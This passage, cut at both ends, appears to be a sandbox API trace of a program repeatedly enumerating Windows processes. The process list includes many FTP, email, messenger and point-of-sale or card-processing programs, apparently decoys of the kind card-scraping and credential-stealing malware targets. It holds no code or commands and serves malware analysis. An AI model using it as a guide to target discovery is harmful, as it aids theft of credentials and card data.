th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0170.547] Process32Next (in: hSnapshot=0x2068, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0170.550] Process32Next (in: hSnapshot=0x2068, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0170.553] Process32Next (in: hSnapshot=0x2068, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0170.555] Process32Next (in: hSnapshot=0x2068, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0170.557] Process32Next (in: hSnapshot=0x2068, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0170.560] Process32Next (in: hSnapshot=0x2068, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0170.562] Process32Next (in: hSnapshot=0x2068, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0170.565] Process32Next (in: hSnapshot=0x2068, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0170.567] Process32Next (in: hSnapshot=0x2068, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0170.569] Process32Next (in: hSnapshot=0x2068, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0170.571] Process32Next (in: hSnapshot=0x2068, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0170.581] Process32Next (in: hSnapshot=0x2068, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0170.585] Process32Next (in: hSnapshot=0x2068, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0170.587] Process32Next (in: hSnapshot=0x2068, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0170.589] Process32Next (in: hSnapshot=0x2068, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0170.591] Process32Next (in: hSnapshot=0x2068, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0170.593] Process32Next (in: hSnapshot=0x2068, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0170.595] Process32Next (in: hSnapshot=0x2068, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0170.597] Process32Next (in: hSnapshot=0x2068, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0170.599] Process32Next (in: hSnapshot=0x2068, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0170.601] Process32Next (in: hSnapshot=0x2068, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0170.603] Process32Next (in: hSnapshot=0x2068, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0170.605] Process32Next (in: hSnapshot=0x2068, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0170.607] Process32Next (in: hSnapshot=0x2068, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0170.609] Process32Next (in: hSnapshot=0x2068, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0170.611] Process32Next (in: hSnapshot=0x2068, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0170.613] Process32Next (in: hSnapshot=0x2068, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0170.618] Process32Next (in: hSnapshot=0x2068, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0170.620] Process32Next (in: hSnapshot=0x2068, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0170.622] Process32Next (in: hSnapshot=0x2068, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0170.625] Process32Next (in: hSnapshot=0x2068, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0170.627] Process32Next (in: hSnapshot=0x2068, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0170.629] Process32Next (in: hSnapshot=0x2068, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0170.631] Process32Next (in: hSnapshot=0x2068, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0170.632] Process32Next (in: hSnapshot=0x2068, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0170.634] Process32Next (in: hSnapshot=0x2068, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0170.636] Process32Next (in: hSnapshot=0x2068, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0170.638] Process32Next (in: hSnapshot=0x2068, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0170.640] Process32Next (in: hSnapshot=0x2068, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0170.642] Process32Next (in: hSnapshot=0x2068, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0170.643] Process32Next (in: hSnapshot=0x2068, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0170.646] Process32Next (in: hSnapshot=0x2068, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0170.648] Process32Next (in: hSnapshot=0x2068, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0170.650] Process32Next (in: hSnapshot=0x2068, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0170.652] Process32Next (in: hSnapshot=0x2068, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0170.654] Process32Next (in: hSnapshot=0x2068, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0170.657] Process32Next (in: hSnapshot=0x2068, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0170.659] Process32Next (in: hSnapshot=0x2068, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0170.661] Process32Next (in: hSnapshot=0x2068, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0170.662] Process32Next (in: hSnapshot=0x2068, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0170.664] Process32Next (in: hSnapshot=0x2068, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0170.666] Process32Next (in: hSnapshot=0x2068, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0170.668] Process32Next (in: hSnapshot=0x2068, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0170.670] Process32Next (in: hSnapshot=0x2068, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0170.671] Process32Next (in: hSnapshot=0x2068, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1398, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0170.673] Process32Next (in: hSnapshot=0x2068, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0170.675] Process32Next (in: hSnapshot=0x2068, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0170.677] Process32Next (in: hSnapshot=0x2068, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0170.679] Process32Next (in: hSnapshot=0x2068, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 0 [0170.681] CloseHandle (hObject=0x2068) returned 1 [0170.681] Sleep (dwMilliseconds=0x64) [0170.797] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1ebc [0170.814] Process32First (in: hSnapshot=0x1ebc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0170.816] Process32Next (in: hSnapshot=0x1ebc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x72, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0170.818] Process32Next (in: hSnapshot=0x1ebc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0170.820] Process32Next (in: hSnapshot=0x1ebc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0170.822] Process32Next (in: hSnapshot=0x1ebc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0170.824] Process32Next (in: hSnapshot=0x1ebc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0170.826] Process32Next (in: hSnapshot=0x1ebc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0170.828] Process32Next (in: hSnapshot=0x1ebc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0170.830] Process32Next (in: hSnapshot=0x1ebc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0170.831] Process32Next (in: hSnapshot=0x1ebc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0170.885] Process32Next (in: hSnapshot=0x1ebc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0170.887] Process32Next (in: hSnapshot=0x1ebc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0170.888] Process32Next (in: hSnapshot=0x1ebc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0170.890] Process32Next (in: hSnapshot=0x1ebc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0170.892] Process32Next (in: hSnapshot=0x1ebc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0170.894] Process32Next (in: hSnapshot=0x1ebc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0170.895] Process32Next (in: hSnapshot=0x1ebc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0170.948] Process32Next (in: hSnapshot=0x1ebc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0170.950] Process32Next (in: hSnapshot=0x1ebc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0170.953] Process32Next (in: hSnapshot=0x1ebc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0170.955] Process32Next (in: hSnapshot=0x1ebc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0170.957] Process32Next (in: hSnapshot=0x1ebc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x30, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0170.959] Process32Next (in: hSnapshot=0x1ebc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0170.960] Process32Next (in: hSnapshot=0x1ebc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0170.962] Process32Next (in: hSnapshot=0x1ebc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, 